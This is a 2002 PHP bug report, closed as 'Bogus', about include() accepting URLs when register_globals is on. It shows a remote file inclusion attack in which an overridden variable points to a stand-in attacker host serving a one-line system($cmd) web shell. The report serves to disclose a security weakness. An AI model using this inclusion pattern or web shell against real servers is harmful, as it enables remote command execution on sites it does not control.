ID: 21085 Updated by: [EMAIL PROTECTED] Reported By: [EMAIL PROTECTED] -Status: Open +Status: Bogus Bug Type: Unknown/Other Function Operating System: ALL PHP Version: 4.3.0RC3 New Comment:
It's really up to the user to validate input from the outside. You can always shoot yourself in the foot if you want to. There is no valid reason to change this default. Previous Comments: ------------------------------------------------------------------------ [2002-12-18 15:34:31] [EMAIL PROTECTED] PHP by default allows include() calls which contain URL/URI strings. register_globals=on include($somevar/file.php); // real site code exploit by overriding $somevar to http://badsite.evilcode.com where file.php is <?php system($cmd); ?> This causes the "real site" to execute the $cmd command passed in on the URL/URI string. Requesting that allow_url_fopen be set to "Off" for future releases and a documentation note made about the caveat. -Mike ------------------------------------------------------------------------ -- Edit this bug report at http://bugs.php.net/?id=21085&edit=1